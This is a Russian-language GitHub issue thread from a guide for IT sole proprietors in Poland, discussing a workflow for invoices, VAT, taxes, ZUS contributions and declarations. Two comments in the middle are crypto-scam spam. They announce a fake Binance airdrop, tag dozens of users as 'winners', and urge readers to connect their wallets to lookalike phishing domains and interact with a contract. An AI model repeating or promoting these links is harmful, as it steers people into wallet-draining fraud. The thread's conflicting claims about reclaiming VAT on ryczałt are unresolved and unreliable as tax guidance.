### ISSUE TITLE
описать типичный воркфлоу для рутинных операций ИПшника

### ISSUE THREAD

**Issue by andrew-potachits** [sobolevbel/jdg#22]
предположения:
многие из нас являются ИТ специалистами на рычалте, имеют одного-двух заказчиков и кол-во фактур в месяц минимально, следовательно многие сидят на системах типа infact.pl и сами ведут бухгалтерию.

имеет смысл написать типичный воркфлоу для ИТ специалиста:
1. по выставлению фактуры: что писать, ВАТ/не ВАТ, в валюте или в злотых, т.д.
2. пришли деньги на счет: куда заносить сумму, как пересчитывать по курсу валюты, переводить или нет на личный счет
3. оплата налога: как посчитать сумму к уплате, что писать в платежке
4. оплата ЗУС: что писать, куда платить 
5. годовая отчетность: формирование декларации в налоговую и ЗУС (если надо)

можно начать с самого распространенного сервиса факторования/бухгалтерии, потом добавлять по желанию другие (если имеет смысл)

**Comment by minzak** [comment]
Смысл имеет!
Также я в самом начале пути, и хотелось бы вообще сравнить сервисы между собой, для выбора.
infact.pl, iFirma, wFirma, и там еще с пяток найдется...

**Comment by iamtodor** [comment]
6. как вычитать VAT на рычалте

**Comment by minzak** [comment]
> 6. как вычитать VAT с покупок на рычалте

К сожелению ВАТ не компенсирутся на Ричалте (
До 200к в год можно без ВАТ, но если >200к то надо регистрировать ВАТ, но купить что-то и компенсировать ВАТ, никак.
На то он и Рычалд, вот на Линевой, 1м и 2м типе - там можно. но там %% другие.

**Comment by iamtodor** [comment]
@minzak `К сожелению ВАТ не компенсирутся на Ричалте (` ну да, ну да.. 
Уже как 8 месяцев на рычалте успешно возвращаю ВАТ (23%) с покупок ;)

**Comment by iamtodor** [comment]
@sobolevbel в рамках этого issue, мне кажется, что нужно как-то связать https://sobolevbel.github.io/jdg/infakt_routine/ и https://sobolevbel.github.io/jdg/workflow/

**Comment by andrew-potachits** [comment]
так что, получается тикет закончен, можно закрывать?

**Comment by sobolevbel** [comment]
> так что, получается тикет закончен, можно закрывать?

В целом да, но можно еще улучшить

**Comment by iamtodor** [comment]
> @sobolevbel а давай накидаем тогда примерный план прям здесь по улучшению? Чего не хватает/что думаешь плохо описано?

@sobolevbel 👀

**Comment by sobolevbel** [comment]
Да, в общем вот есть страничка https://sobolevbel.github.io/jdg/workflow/.

На мой взгляд ее нужно подробней и детальней расписать, а то там сейчас довольно общие слова, давно собираюсь этим заняться.

**Comment by iamtodor** [comment]
@sobolevbel ага, то, что страничка есть, то я понимаю. Я имел ввиду подсуммировать чего не хватает, что именно детальнее расписать? Имеет смысл?

**Comment by Przemocny** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://giveway.binancbnbrewards.online/4JhoUO)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://giveway.binancbnbrewards.online/4JhoUO) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by kaneson** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @jeoung5558, @nbibbleppert, @lorisdev, @tuanductran, @mjraha592, @marcelooblan2016, @itswavyjhub, @lemenkov, @xkyanari, @krishaamer, @credfeto, @dmicc, @amimaro, @mushfik116, @doris12131997, @baermathias, @scltrnd, @yangfa888, @ewanhohou, @madghi, @woutbijlow, @noyyyy, @yujeongJeon, @benjaminrae, @ChristopherTrimboli, @2IIZ, @pantaovay, @universay, @RogerHiguerey, @EdwinValdezHD

**Comment by pointless-henry** [comment]
этот ticket очень обобщённый. после прочтения я не понимаю, что здесь уже сделано, а что ещё осталось сделать. давайте применять итеративный подход: в рамках отдельных тикетов предлагать конкретные улучшения для материалов в статье https://sobolevbel.github.io/jdg/workflow/
когда эти улучшения внесены в гайд и протестированы, то закрывать тикет.

**Comment by sobolevbel** [comment]
Реализовано: гайд «Рабочий процесс» покрывает описанный воркфлоу — выставление фактур, учёт оплат и курсовых разниц, оплата налогов и ZUS, декларации. См. https://sobolevbel.github.io/jdg/workflow/ плюс детальные страницы по inFakt и wFirma (ежемесячные операции). Закрываю как выполненное.
